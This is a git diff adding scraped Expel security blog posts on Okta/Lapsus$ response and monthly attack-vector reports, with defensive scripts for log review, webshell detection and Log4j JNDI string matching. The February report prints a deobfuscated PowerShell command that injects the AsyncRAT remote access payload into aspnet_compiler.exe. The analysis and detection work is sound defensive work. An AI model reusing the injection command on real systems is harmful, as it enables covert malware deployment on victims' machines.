Automation, not humans, completed key investigative actions 77% of the time we sent an alert to our SOC for review. When analysts spend less time buried in manual tasks, it boosts scale and levels up quality by standardizing investigative steps. 5: Orchestration dramatically improves remediation time Orchestration not only improves scale and quality in our SOC, but also accelerates remediation. When our SOC identifies an incident, analysts investigate to uncover the scope and create remediation actions to reduce risk. Workbench automatically executes remediation actions for our customers, such as containing a host, disabling an account, removing phishing emails, or adding attacker indicators of compromise (IOCs)/hashes to a \u2018deny\u2019 list. In Q2, the median time to complete a remediation action not automated through orchestration was two hours. What happens when a remediation action is automated via orchestration? That median time drops to seven minutes\u2014a 1640% improvement. We know what you\u2019re thinking\u2014with so many great takeaways in this blog, what more could the full report have in store? See for yourself." +} \ No newline at end of file diff --git a/top-7-recs-for-responding-to-the-lapsus-breach-claims.json b/top-7-recs-for-responding-to-the-lapsus-breach-claims.json new file mode 100644 index 0000000000000000000000000000000000000000..d83b9bb874012f89ede25ffd12969f1a3561d6c5 --- /dev/null +++ b/top-7-recs-for-responding-to-the-lapsus-breach-claims.json @@ -0,0 +1,6 @@ +{ + "title": "Top 7 recs for responding to the Lapsus$ breach claims", + "url": "https://expel.com/blog/top-7-recs-for-responding-to-the-lapsus-breach-claims/", + "date": "Mar 23, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Top 7 recs for responding to the Lapsus$ breach claims Security operations \u00b7 2 MIN READ \u00b7 JONATHAN HENCINSKI \u00b7 MAR 23, 2022 \u00b7 TAGS: MDR By now, you\u2019ve likely heard about the situation that unfolded yesterday around Okta and the Lapsus$ breach claims. As of today, March 23, 2022, Okta\u2019s investigation is ongoing . While the new information and more limited scope may reduce the risk to organizations, Okta\u2019s investigation continues and the situation remains fluid. This post will walk you through our recommendations for immediate and strategic steps you can take to protect yourself and your org. Here are our top 7 recommendations: Rotate privileged Okta passwords and Okta API tokens. Unless a business need exists, we strongly recommend disabling of the following Okta configurations: Give Access to Okta Support Give Directory Debugger Access to Okta Support Review Okta logs looking at admin authentications and activity for the past four months (January 1 through March 22, 2022 is a good time frame). During this same chunk of time, check out any Okta admin activity to ensure it aligns with expected activities and sources. Specifically, review these events: eventType eq \u201cuser.mfa.factor.deactivate\u201d eventType eq \u201cuser.account.update_password\u201d For these types of events, you\u2019ll need to review entries generated by non-admin users or events marked as \u201cOkta System.\u201d If an Okta account was found to have had MFA disabled during the January through March 22 timeframe, ask these two questions: Who was the user? What was the root cause of the disablement? Once you answer those, re-enable MFA for those accounts. From there, enable MFA on initial Okta login and on all individual applications. 
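If you would rather script the Okta log review above than click through the console, the Okta System Log API accepts the same eventType filters. A minimal sketch follows; the org URL, API token, and time window are placeholders, and you would point the output at whatever review process you use.

import requests

OKTA_ORG = "https://your-org.okta.com"   # placeholder
API_TOKEN = "..."                        # read-only API token, stored securely

EVENT_TYPES = ["user.mfa.factor.deactivate", "user.account.update_password"]

for event_type in EVENT_TYPES:
    resp = requests.get(
        f"{OKTA_ORG}/api/v1/logs",
        headers={"Authorization": f"SSWS {API_TOKEN}"},
        params={
            "since": "2022-01-01T00:00:00Z",
            "until": "2022-03-22T23:59:59Z",
            "filter": f'eventType eq "{event_type}"',
        },
    )
    resp.raise_for_status()
    # Note: results are paginated; follow the response's Link header for more pages.
    for event in resp.json():
        actor = event.get("actor", {})
        target = (event.get("target") or [{}])[0]
        print(event_type, event.get("published"), actor.get("alternateId"), "->", target.get("alternateId"))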
Consider how your organization might replace legacy MFA solutions (SMS text and digital tokens) with a FIDO compliant solution. Based on your organization\u2019s geographical presence, consider configuring Okta network zones to deny authentication from countries your organization would consider atypical. Take some time to plan. Establish terms and conditions for incident response services before a security incident by executing an Incident Response (IR) retainer. This proactive approach can significantly reduce response time and impact. Use this as an opportunity to test your incident response plan (IRP). Don\u2019t have an IRP? It\u2019s time to make one. Then test it, and test it again. Communicate transparently about what you\u2019re doing and what you\u2019ve done to your internal and external stakeholders. The clearer you are up front, the less confusion arises as you deal with quick changes that might have a wide effect within your org. When communicating during a fluid situation, it\u2019s important to set expectations and prepare stakeholders for change. In your communications, be clear on what decisions you\u2019ve made, what you know, what you don\u2019t know, and when you\u2019ll be in touch next. Like many of you, we\u2019re watching the situation closely. If you have any questions about our recommendations, chat us anytime ." +} \ No newline at end of file diff --git a/top-attack-vectors-august-2021.json b/top-attack-vectors-august-2021.json new file mode 100644 index 0000000000000000000000000000000000000000..8bf1e8b643c94346af0e1d6d1f75a3b323995727 --- /dev/null +++ b/top-attack-vectors-august-2021.json @@ -0,0 +1,6 @@ +{ + "title": "Top Attack Vectors: August 2021", + "url": "https://expel.com/blog/top-attack-vectors-august-2021/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG Top Attack Vectors: August 2021 Security operations \u00b7 5 MIN READ \u00b7 TYLER FORNES AND BRITTON MANAHAN \u00b7 SEP 16, 2021 \u00b7 TAGS: MDR We\u2019re often asked about the biggest threats we see across the incidents we investigate for our customers. Where should security teams focus their efforts and budgets? To answer these questions, we\u2019re sharing monthly reports on the top attack vectors, trends, and resilience recommendations identified by our Security Operations Center (SOC). Our goal is to translate the security events we\u2019re detecting into security strategy for your org. For this report, our SOC analyzed the incidents we investigated in August 2021 to determine the top attack vectors used by bad actors. A sneak peek at what\u2019s ahead: What to do about business email compromise (BEC) The rise in exploited public-facing vulnerabilities and our #1 resilience recommendation How credential-stealing malware is targeting crypto wallets Business email compromise (BEC) TL;DR: BEC continues to top the charts. Azure AD Identity Protection helps. It\u2019s no surprise to us that in August 2021, 63 percent of incidents our SOC handled were the result of a business email compromise. BEC continues to be the number one attack vector across our customers. However, BEC is different from a standard phishing attack. What we\u2019re looking for in these cases is an attacker abusing a stolen credential (previously phished from a user) and using it to access that user\u2019s inbox \u2013 giving them access to sensitive information. Chaos ensues, and we\u2019ve witnessed everything from mass mail spam to fraudulent wire transfers happen next. 
Wondering how to get better at identifying BEC? In August, 61 percent of all BEC we responded to was identified by Azure AD Identity Protection. This is no surprise \u2013 last month, we noted that 53 percent of BEC incidents we identified were targeted against Microsoft O365. We can safely assume that Microsoft accounts will remain a prime target for attackers heading into the later months of 2021. But if you\u2019re an org struggling with BEC and looking for a solution, Azure AD Identity Protection can provide help. What do we like about it? Its ability to identify anomalous logins based on tracking a user\u2019s login behavior. Azure AD Identity Protection generates profiles based on this information, then provides dynamic alerting that can be adjusted based on a user\u2019s travel and location history. When a user logs in from two improbable places at once (i.e. the U.S and West Africa), you get an alert. We refer to this as Geo infeasibility at Expel, and it\u2019s the number one way we catch bad actors in inboxes. That being said, a single product won\u2019t solve all your woes here. But the stats speak for themselves. Azure AD Identity Protection is a powerful tool for catching BEC. We\u2019d bet our paychecks that BEC will continue to top the charts of attack vectors for the rest of 2021 and into 2022. If you haven\u2019t reviewed your defenses recently, here\u2019s your monthly reminder to enable multi-factor authentication (MFA) and disable IMAP and POP3. Resilience recommendations: You know we\u2019re going to say it, but MFA everything and everywhere. Conditional access policies are a great way to help mitigate Geo infeasibility. Disable legacy protocols like IMAP and POP3 (these don\u2019t enforce MFA). Consider Azure AD Identity Protection to help identify suspicious mailbox logins. Public-Facing Vulnerabilities TL;DR: Opportunistic attackers are taking advantage of vulnerable web applications more than ever. Incidents involving the exploitation of public-facing web applications rose 400 percent from July 2021. Overall, 55 percent of our critical incidents in August 2021 were found to be the result of an exploited application running on a public-facing web server. Why? We\u2019re finding that most of these attacks are opportunistic, looking to deploy ransomware, coin miners and webshells. In most cases, the scripted delivery of these exploits is the result of internet-wide scanning and allows an opportunistic attacker to broaden their attack surface and proliferate their payload of choice in as many orgs as possible. Once exploited, we notice the early signs of these attacks through detections that monitor a web-working process (such as IIS or Apache) spawning a command shell (cmd/bash/PowerShell). In these relationships, we\u2018re looking for a command shell that\u2019s downloading a second stage payload or performing unusual reconnaissance actions that may indicate the presence of a webshell. Below is a summary of the top web application vulnerabilities we\u2019ve seen exploited across our customer base. One key takeaway: more than half of the vulnerabilities we\u2019ve seen exploited are over two years old. CVE-2019-2725 Oracle WebLogic Server CVE-2019-18935 Telerik UI for ASP.NET AJAX CVE-2018-7669 Sitecore CMS CVE-2017-10271 Oracle WebLogic Server CVE-2021-26084 Confluence Server From our security team to yours \u2013\u2014 identifying and patching border-facing assets should be number one on your to-do list. 
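That web-server-spawns-a-shell relationship described above is easy to express as a check over whatever process telemetry your EDR exports. A minimal sketch, assuming a CSV export with parent and child process names (the column names and file are placeholders; match them to your tooling):

import csv

WEB_PARENTS = {"w3wp.exe", "httpd", "apache2", "nginx"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "sh", "bash"}

def webshell_candidates(path):
    with open(path, newline="") as fh:
        for row in csv.DictReader(fh):
            parent = row["parent_name"].lower()
            child = row["process_name"].lower()
            if parent in WEB_PARENTS and child in SHELL_CHILDREN:
                yield row

for row in webshell_candidates("process_events.csv"):
    print(f"{row['hostname']}: {row['parent_name']} spawned {row['process_name']} ({row['command_line']})")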
If you aren\u2019t sure where to start, a few quick queries on Shodan can save you a lot of heartbreak by helping you understand what applications are exposed (and potentially vulnerable) at the border of your network. Here\u2019s a simple one to get you started: net:1.2.3.4/24 (where 1.2.3.4 is your network range in CIDR notation) Resilience recommendations: Deploy an Endpoint Detection and Response (EDR) tool on web servers. Scan and identify public-facing assets using Shodan. Ensure public web applications are patched to their latest version. Deploy a Web Application Firewall (WAF). Credential Stealers TL;DR: Attackers are hungrier than ever for crypto. Keep your wallets safe! Commodity malware is riddled with credential stealers, and we see a lot of them. In fact, we noticed that 15 percent of incidents we identified in August included the deployment of credential stealing malware by an attacker \u2014 a 114 percent increase from July 2021. We noticed several samples of the REDLINE malware being deployed throughout our customer base. In all cases, REDLINE was delivered through a zipped executable to the user, likely through a phishing email. These campaigns rely on the \u201cdouble click and let it rip\u201d principle, where user interaction is required to kick off the infection. We talked at length about this in July\u2019s report, and firmly expect the trend of threat actors favoring user execution to continue. We dug through several samples of REDLINE during August 2021 and had a few surprising findings. First, what\u2019s old is new again \u2014 all samples of REDLINE that we analyzed used the Nullsoft Scriptable Install System to kick off the malware installation. A blast from the past, but a solid way of presenting a familiar and user-friendly interface for installing \u201csoftware.\u201d Second, as August progressed and we observed additional REDLINE samples, we noticed that the malware started to heavily target cryptocurrency wallets resident on the infected machines. It became obvious that as trends in cryptocurrency favored certain coins, REDLINE developers were quick to add wallets of high value. This is a good reminder that credential stealers are highly configurable and also often target stored credentials in browsers, financial services and other legitimate software. As 2021 beats on, it\u2019s more important than ever to talk to your users about trusted software and identifying suspicious applications. Nine times out of ten, if someone emails you a zip file and asks you to install a piece of software, it\u2019s likely bad. Resilience recommendations: We know it\u2019s a tall order, but spend some time educating your users about trusted software and identifying suspicious applications. Consider implementing an application safelisting tool (like Windows Defender Application Control) to help defend against malicious software installation. Consider implementing/tuning your email gateway to inspect zipped attachments that include executables, or encrypted zip files. Takeaways August continued to prove that BEC isn\u2019t going away anytime soon. You know our top recommendation \u2014 MFA, MFA, MFA. But also take a look at how Azure AD Identity Protection may be able to help your org clamp down on BEC attempts through Geo infeasibility notifications. Also check out our phishing recommendations in last month\u2019s report to keep bad actors from accessing credentials in the first place. Next: exploitation of vulnerabilities in public-facing web apps is on the rise.
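Since Shodan keeps coming up: if you want to go beyond one-off searches in the web interface, the same query can be scripted with the official shodan Python library. A short sketch (the API key is a placeholder, the netblock is the example from above, and note that the net: filter requires a paid API plan):

import shodan

api = shodan.Shodan("YOUR_API_KEY")       # placeholder key
results = api.search("net:1.2.3.4/24")    # substitute your real CIDR range

print("total exposed services:", results["total"])
for match in results["matches"]:
    print(match["ip_str"], match["port"], match.get("product", "unknown"))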
Number one on the to-do list is to identify and patch border-facing assets \u2014 Shodan is a great tool to help identify exposure. Then consider taking some of the additional resilience actions we\u2019ve discussed, like deploying an EDR tool and a Web Application Firewall (WAF). Lastly, user execution will remain bad actors\u2019 preferred method of infection. So ramp up user education on trusted software and identifying suspicious applications to keep malicious zipped attachments from impacting your org. Also watch out for users\u2019 crypto wallets as malware adapts to target new trends in cryptocurrency. We\u2019ll be back with insights on September\u2019s top attack vectors. Have questions about this month\u2019s data or what it means for your org? Drop us a note ." +} \ No newline at end of file diff --git a/top-attack-vectors-december-2021.json b/top-attack-vectors-december-2021.json new file mode 100644 index 0000000000000000000000000000000000000000..2e174f499f0f7cd4dec7b1774760756a13315bf2 --- /dev/null +++ b/top-attack-vectors-december-2021.json @@ -0,0 +1,6 @@ +{ + "title": "Top Attack Vectors: December 2021", + "url": "https://expel.com/blog/top-attack-vectors-december-2021/", + "date": "Jan 13, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Top Attack Vectors: December 2021 Security operations \u00b7 7 MIN READ \u00b7 BRITTON MANAHAN \u00b7 JAN 13, 2022 \u00b7 TAGS: MDR We\u2019re often asked about the biggest threats we see across the incidents we investigate for our customers. Where should security teams focus their efforts and budgets? To answer these questions, we\u2019re sharing monthly reports on the top attack vectors, trends, and resilience recommendations identified by our security operations center (SOC). Our goal is to translate the security events we\u2019re detecting into a security strategy for your org. For this report, our SOC analyzed the incidents we investigated in December 2021 to determine the top attack vectors used by threat actors. In a month with cybersecurity news about the Log4j vulnerability making top headlines, here\u2019s what stood out: Threat actors performing large-scale scans to exploit systems using the Log4j zero-day vulnerability Attackers continuing to use the Cobalt Strike command and control toolkit as malware Threat actors using a new attack pattern to deploy ransomware Attackers authenticating into an isolated Citrix remote access session, then breaking out of it Read on to learn more and see our tips for what to do about all of the above. Log4j vulnerability was a top target TL;DR: The recently-discovered Log4j vulnerability was a major target in December as attackers tried to outrun remediation by scanning the web for unpatched instances to exploit. This probably isn\u2019t your first time hearing about the Apache Log4j zero-day vulnerability discovered in early December 2021. It\u2019s now considered one of the most impactful vulnerabilities uncovered in recent years. In a nutshell, this vulnerability allows for arbitrary remote code execution by exploiting a flaw in JNDI lookups performed by the Log4j Java logging library. This vulnerability is so devastating because of the number of software applications and libraries that rely on Log4j, putting hundreds of millions of devices at risk . We\u2019ve received a steady stream of alerts related to the widespread scanning activity threat actors are conducting to locate vulnerable systems. 
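One quick way to see whether that scanning activity is reaching your own applications is to sweep recent logs for JNDI lookup strings, including the lightly obfuscated variants attackers use to dodge naive matching. A minimal sketch (the log path is a placeholder, and the pattern is deliberately loose, so expect some false positives to review by hand):

import re

# Matches ${jndi:...} plus common obfuscations like ${${lower:j}ndi:...}
JNDI_PATTERN = re.compile(r"\$\{.*j.*n.*d.*i.*:", re.IGNORECASE)

def suspicious_lines(path):
    with open(path, errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            if JNDI_PATTERN.search(line):
                yield lineno, line.rstrip()

for lineno, line in suspicious_lines("/var/log/app/access.log"):   # placeholder path
    print(f"line {lineno}: {line}")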
And since this commonly-used logging library provides such a large attack surface, it\u2019s no surprise that attackers are finding success. In fact, 100 percent of incidents involving public-facing exploits that we investigated in December were a result of the Log4j zero-day vulnerability. Out of the successful Log4j exploits we observed, 50 percent established a remote shell on the exploited system while the other half deployed malware like Cobalt Strike. The incidents involving remote shells may have been first steps towards deploying malware, but were detected and the systems contained before attackers had the chance. When we have evidence that malware\u2019s running on a system, our priorities are to stop it, then figure out how it got there. In December, many of our initial leads were broad internet scanning activity that we then had to investigate further to determine whether any successful Log4j exploitation actually occurred. And proving something malicious didn\u2019t happen is definitely the more time-consuming task. So we spent a lot of time examining network activity on the targeted hosts for potential successful callbacks to attacker-controlled endpoints. Due to the up-stream nature of the Log4j library (meaning its use by third-party apps and libraries), it can be difficult for orgs to know which of their systems may be running Log4j and are vulnerable to an exploit. As a result, this vulnerability will likely remain relevant for some time, even though patches have been released. Resilience recommendations: Determine if you\u2019re logging applications to other managed logging platforms (local or cloud-hosted). Validate whether these apps are vulnerable and/or impacted by this zero-day vulnerability. Use a vulnerability scan to confirm your findings and attack surface for this vulnerability. Anyone using Log4j should update to version 2.17.1 ASAP. The latest version is already on the Log4j download page . The patched version of Log4j 2.17.1 requires a minimum of Java 8. If you\u2019re on Java 7, you\u2019ll need to upgrade to Java 8. If updating to the latest version isn\u2019t possible, you can also mitigate exploit attempts by removing the JndiLookup class from the classpath. Cobalt Strike TL;DR: Cobalt Strike was the most common malware family we observed in December and continues to be a favorite of threat actors. In December 2021, 20 percent of the incident payloads we identified were variants of the Cobalt Strike penetration testing command and control (C2) framework. While originally designed as a paid tool for legitimate engagements, Cobalt Strike\u2019s module nature and capabilities have made it a favorite tool of threat actors. It\u2019s also motivated them to crack versions and release them on the secret web. The Cobalt Strike Beacon payload can be generated in many forms, including a stand-alone exe, but it\u2019s most often reflectively loaded into memory by an initial stage payload as a file-less loaded DLL. The functionality provided by this framework includes (but isn\u2019t limited to) command and script execution, covert encryption communication over different network protocols, file uploads and downloads, reconnaissance, privilege escalation, and lateral movement. Threat actors used several delivery methods and first stage payloads in December to ultimately try to establish a C2 connection through a Cobalt Strike Beacon. 
The initial infection vectors for these incidents included: Phishing Public-facing exploitation of Log4j Drive-by download Using those infection vectors, attackers delivered these first stage payloads, which then tried to load different variants of a Cobalt Strike Beacon: BazarLoader Gootkit Generic Obfuscated PowerShell Clearly, threat actors are using a variety of infection vectors to deploy an initial malware stage embedded with or configured to download a Cobalt Strike Beacon payload. Attackers have a wide range of choices for this initial stage, using Windows executables or scripting languages across different malware variants. But they typically avoid having the Beacon payload touch persistent storage when loading it into memory (file-less malware). Resilience recommendations: Confirm your endpoint detection and response (EDR) coverage across all of your endpoints. Perform a vulnerability scan against your externally-facing systems. Consider conducting internal or external penetration testing using a legitimate version of the Cobalt Strike framework . Implement network layer controls capable of detecting or blocking traffic to low reputation destinations. Conduct regular security awareness training for your employees with a focus on phishing. Other incidents of note TL;DR: Two particularly interesting incidents stood out in December \u2013 one where threat actors were likely preparing to deploy ransomware and another where they broke out of a remote access Citrix session. One incident of note that we observed in December highlights a recent pattern across attack lifecycle stages used to ultimately deploy ransomware across an environment. The incident began with a phishing email used to deploy the initial BazarLoader malware payload, which communicated out over a URL that tried to appear related to Zoom \u2013 our first indicator of malicious activity. The indicators of compromise (IOCs) from this incident directly correlated to an ongoing campaign where attackers use BazarLoader to download and load a Cobalt Strike Beacon into memory to start internal reconnaissance on the network and establish a valid method of lateral movement. Threat actors then typically begin widespread deployment of the Diavol family of ransomware. However, we detected this activity early in its lifecycle and contained the system that the attackers were using as an entry point before they could deploy ransomware. A second notable incident we detected and responded to in December involved a server running the Citrix remote access application. After obtaining credentials provided to a third-party vendor, the threat actors were able to authenticate into a Citrix remote access session running on the server. The most interesting part of this incident happened next \u2013 the attackers were able to break out of this isolated session with a method using Internet Explorer . We determined this through the process tree, which showed Internet Explorer as the parent process for several command prompt, PowerShell, and system reconnaissance-related processes. After breaking out of the isolated Citrix session, the attacker acquired credentials and used Remote Desktop Protocol (RDP) to move laterally in the environment and access several additional systems. However, they were detected and expelled from the environment before they had time to exfiltrate any sensitive data or perform any other harmful activities.
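The process-tree tell from that Citrix incident translates into a simple detection idea: alert whenever a browser becomes the parent of shells or reconnaissance utilities. Below is a minimal sketch over a hypothetical event schema, so map the field names to whatever your EDR or SIEM actually exports:

# Hypothetical schema: each event is a dict with 'parent' and 'child' process names.
SUSPICIOUS_CHILDREN = {'cmd.exe', 'powershell.exe', 'whoami.exe', 'net.exe', 'nltest.exe'}

def flag_browser_breakout(events):
    # Flag cases where Internet Explorer spawns shells or recon utilities, the pattern
    # observed when the attacker broke out of the isolated Citrix session.
    return [event for event in events
            if event['parent'].lower() == 'iexplore.exe'
            and event['child'].lower() in SUSPICIOUS_CHILDREN]

sample = [{'parent': 'iexplore.exe', 'child': 'cmd.exe'},
          {'parent': 'explorer.exe', 'child': 'notepad.exe'}]
print(flag_browser_breakout(sample))  # only the first event is flagged

In production you would enrich this with the Citrix or published-application context, but even the bare parent/child check would have surfaced the activity described above.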
Resilience recommendations Regularly perform an external penetration test to make sure your environment is prepared to detect advanced tactics and techniques. Review your company\u2019s incident response process and procedures to make sure you can confirm true positives and respond promptly to incidents in progress to minimize the impact a threat actor can have. Confirm your endpoint detection and response (EDR) coverage to maximize your visibility and ability to respond in your environment. Takeaways Phishing remained the most common attack vector in December ( check out our top resilience recs !), but we also observed a bunch of novel trends and incidents. The recently-discovered Log4j zero-day vulnerability is historic because of its frequent use as an error logging library in a variety of Java-based apps. Threat actors wasted no time starting to mass scan the Internet for vulnerable systems and try exploits to establish remote shells or deploy malware. While activity related to this vulnerability has come down from its peak in December, Log4j will stay relevant for some time because of its widespread (and sometimes difficult to identify) impact. If you haven\u2019t already, it\u2019s critical to understand which of your systems are running Log4j and make sure they\u2019re updated to version 2.17.1. The most common malware payload we observed in December was the Cobalt Strike Beacon. Attackers are more and more drawn to cracked versions of this penetration testing software released on the secret web because of the number of built-in features it provides and its high level of stability. To avoid detection, this command and control framework is most commonly reflectively loaded into memory by the initial payload delivered to the host, without touching persistent storage. To help defend against malicious Cobalt Strike, focus on initial infection vectors by conducting regular security training for your employees and performing vulnerability scans of your externally-facing systems. We also highlighted two interesting incidents that we responded to in December. One of these involved a recent threat actor campaign following an established formula for typical network intrusion. This flow uses a phishing email as the initial entry point to deliver a first stage payload. The first stage malware then brings down additional functionality to perform internal reconnaissance, privilege escalation, and lateral movement. Once the attacker is satisfied with the level of access they\u2019ve gained in the environment, they\u2019ll deploy a ransomware variant. But in this particular incident, the threat actor was detected and stopped before they could release ransomware into the environment. Another notable incident in December involved a Citrix remote session authenticated through compromised third-party credentials. The attacker was able to break out of this isolated Citrix session with one of several methods that use Internet Explorer. Once the threat actor broke out and had access to the underlying server, they were able to gather credentials to start moving laterally before they were expelled from the environment. Consider having an external third party perform a penetration test in your environment to evaluate your security controls against sophisticated attacker techniques. We\u2019ll be back with insights on January\u2019s top attack vectors. In the meantime, have questions about this month\u2019s data or what it means for your org? Drop us a note ." 
+} \ No newline at end of file diff --git a/top-attack-vectors-february-2022.json b/top-attack-vectors-february-2022.json new file mode 100644 index 0000000000000000000000000000000000000000..3518199c609af302b7a4530cee7a5b85bdf32f4e --- /dev/null +++ b/top-attack-vectors-february-2022.json @@ -0,0 +1,6 @@ +{ + "title": "Top Attack Vectors: February 2022", + "url": "https://expel.com/blog/top-attack-vectors-february-2022/", + "date": "Mar 17, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Top Attack Vectors: February 2022 Security operations \u00b7 8 MIN READ \u00b7 BRITTON MANAHAN, SIMON WONG AND HIRANYA MIR \u00b7 MAR 17, 2022 \u00b7 TAGS: MDR We\u2019re often asked about the biggest threats we see across the incidents we investigate for our customers. Where should security teams focus their efforts and budgets? To answer these questions, we\u2019re sharing monthly reports on the top attack vectors, trends, and resilience recommendations identified by our security operations center (SOC). Our goal is to translate the security events we\u2019re detecting into a security strategy for your org. For this report, our SOC analyzed the incidents we investigated in February 2022 to determine the top attack vectors used by threat actors. Here\u2019s what stood out this month: Attackers using tried and true tactics \u2013 including Log4j \u2013 to infiltrate systems and deploy coin miners Threat actors deploying the \u201cAsyncRAT\u201d remote administration tool through an ISO file Phishing tactics targeting credentials through Adobe and cryptocurrency Keep reading for details and our tips on what to do about all the above. The usual suspects TL;DR: It\u2019s important to keep an eye on known threats even as new ones emerge. We observed attackers using multiple threat vectors and tactics this month that we\u2019ve highlighted in previous reports. In February 2022, we observed a more even distribution of non-phishing threat vectors, with the usual suspects from previous reports making a reappearance. This includes removable media ranking as the initial vector for five percent of February\u2019s incidents, indicating it remains a relevant threat after our discussion in last month\u2019s report . The second-most frequent attack vector in February was the use of valid credentials. In two of the incidents involving valid credentials, we saw attackers authenticate into cloud-based single sign-on (SSO) identity providers. We detected and stopped this activity before attackers could progress based on logins from abnormal countries and the identity provider reporting suspicious activity for the account. We previously covered the opportunities available to threat actors who gain access to SSO accounts in our September 2021 report. Phishing emails containing links to credential harvesters and other types of credential exposure or reuse increase the risk of threat actors gaining access to any business apps provisioned by the SSO provider. It\u2019s not uncommon for credential harvester pages to mimic popular SSO cloud identity providers like Okta . While down significantly from previous months, we also observed one public-facing exploit used to deploy a crypto miner in February. In this incident, the attacker took advantage of the Log4j vulnerability, which we detected based on indicators of compromise (IOCs) matching a current threat actor campaign . 
In our December 2021 report, we spoke about how the downstream nature and prevalence of this Java logging library will keep this vulnerability relevant for some time. Another trend called out in our October 2021 report was cybercriminals targeting cryptocurrency by hijacking computing resources to mine for rewards \u2014 also known as cryptojacking. In the previously mentioned Log4j incident, we saw the threat actor use their unauthorized access to deploy the XMRig crypto mining software. Despite the current dip in the cryptocurrency market, threat actors are clearly still interested in acquiring cryptocurrency as 15 percent of payloads deployed in critical incidents we investigated in February were crypto mining software. Resilience recommendations: Make sure your security awareness training includes sections on the dangers of external USB storage devices. Implement phish-resistant MFA everywhere (FIDO/WebAuthn). Enforce MFA prompts when users connect to sensitive apps through app-level MFA. Conduct a vulnerability scan to understand your attack surface and detect any vulnerabilities present on public-facing systems. If you\u2019re using Log4j, you should update to version 2.17.1 ASAP if you haven\u2019t already. The latest version is on the Log4j download page . The patched version of Log4j 2.17.1 requires a minimum of Java 8. If you\u2019re on Java 7, you\u2019ll need to upgrade to Java 8. If updating to the latest version isn\u2019t possible, you can also mitigate exploit attempts by removing the JndiLookup class from the classpath. AsyncRAT TL;DR: We observed AsyncRAT malware used as a payload in several incidents this month. The AsyncRAT malware variant made up 15 percent of all identified malware payloads for incidents we responded to in February 2022. AsyncRAT is an open-source remote administration tool (RAT) written in C# and available on GitHub. Its functionality includes all the standard RAT abilities, including file uploading, downloading, and command execution. The incidents we encountered deployed AsyncRAT using an initial ISO file, which was mounted on the local computer system as a drive containing a VBScript file. When executed, this initial VBScript file launches a PowerShell script that\u2019s responsible for decompressing two DotNet modules. One of these DotNet modules is loaded into memory by the PowerShell script while the raw bytes for the second module are passed as a parameter to the initial module. The initial DotNet module loaded into memory by the PowerShell script then injects the second DotNet module (the AsyncRAT payload) into a process supplied as a parameter. In both incidents, aspnet_compiler.exe, the compilation tool for ASP.NET website projects, was the target process for this final AsyncRAT payload. The deobfuscated command from the PowerShell script used to achieve this AsyncRAT injection was: [Reflection.Assembly]::Load($InjectionModule).GetType('NV.b').$get1('Execute').Invoke($null,('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$AsyncRAT)) $InjectionModule is the DotNet module that performs the process injection based on the target program (aspnet_compiler.exe in this example) and $AsyncRAT holds the raw bytes for the AsyncRAT remote access payload that will be injected into the remote process.
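One practical way to hunt for this technique is to search PowerShell ScriptBlock logs (Event ID 4104) for reflective assembly loads. The sketch below assumes ScriptBlock logging is enabled and that the captured script text has been exported to a file; legitimate tooling also loads assemblies reflectively, so treat hits as investigative leads rather than verdicts:

import re

REFLECTIVE_LOAD = re.compile(r'\[Reflection\.Assembly\]::Load\(', re.IGNORECASE)
INJECTION_TARGET = re.compile(r'aspnet_compiler\.exe', re.IGNORECASE)

def score_script_block(text):
    # Return the reasons a captured script block looks like reflective injection tradecraft.
    reasons = []
    if REFLECTIVE_LOAD.search(text):
        reasons.append('reflective assembly load')
    if INJECTION_TARGET.search(text):
        reasons.append('references aspnet_compiler.exe')
    return reasons

with open('scriptblocks.txt', errors='ignore') as handle:  # placeholder export of 4104 events
    print(score_script_block(handle.read()))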
Additionally, our analysis found that the DotNet modules from one of these incidents added a level of obfuscation by using the ConfuserEx DotNet module obfuscator to avoid detection of the fileless DotNet module components. These components are considered fileless because their unobfuscated and decompressed versions are never written to persistent storage, but are loaded into the live run-time memory of the local computer system. Resilience recommendations: Confirm your endpoint detection and response (EDR) coverage across all of your endpoints. Configure Windows Script Host (WSH) files to open in Notepad. By associating these file extensions with Notepad, you mitigate a primary entry point. Implement layered security controls across your environment to detect and prevent evolving threats. Perform a penetration test against your environment to evaluate any gaps in your security. Subscribe to open source intelligence (OSINT) feeds to stay up-to-date on malware trends and use this intelligence in your deployed security tech. Phishing TL;DR: We saw an increase in credential harvesters using Adobe services and cryptocurrency scam emails in February 2022. As usual, phishing was the biggest attack vector used by threat actors in February, involved in 57 percent of the incidents we investigated. We reviewed over 5,000 potentially malicious email submissions and identified two key phishing trends using the following techniques: Credential harvesters using Adobe services We noticed an increase in the number of emails using legitimate Adobe domains. Attackers are taking advantage of the ability to register an adobe.com subdomain through Adobe Campaign to give their emails a sense of legitimacy. Emails from this trend typically contain requests to collaborate on new projects, aiming to deceive recipients into believing the emails are legitimately work-related. Phishing invitation to view a fake business proposal using Adobe services Recipients are instructed to follow links that redirect them to what seems to be an Adobe webpage, but actually prompts them to download a file containing malicious code or click another link to navigate to a fake sign-in page. If the victim then enters their credentials, threat actors capture them and can begin a business email compromise attempt. Fake credential harvesting login page posing as a Microsoft page (note the suspicious URL) Cryptocurrency scams Since the surge in popularity of cryptocurrency, we\u2019ve observed an influx of new phishing tactics as threat actors try to take advantage of the anonymity of cryptocurrency transactions to keep themselves from being traced. Since the start of the invasion of Ukraine, threat actors have specifically begun to impersonate legitimate aid organizations to exploit people\u2019s desire to support refugees and victims with donations. 
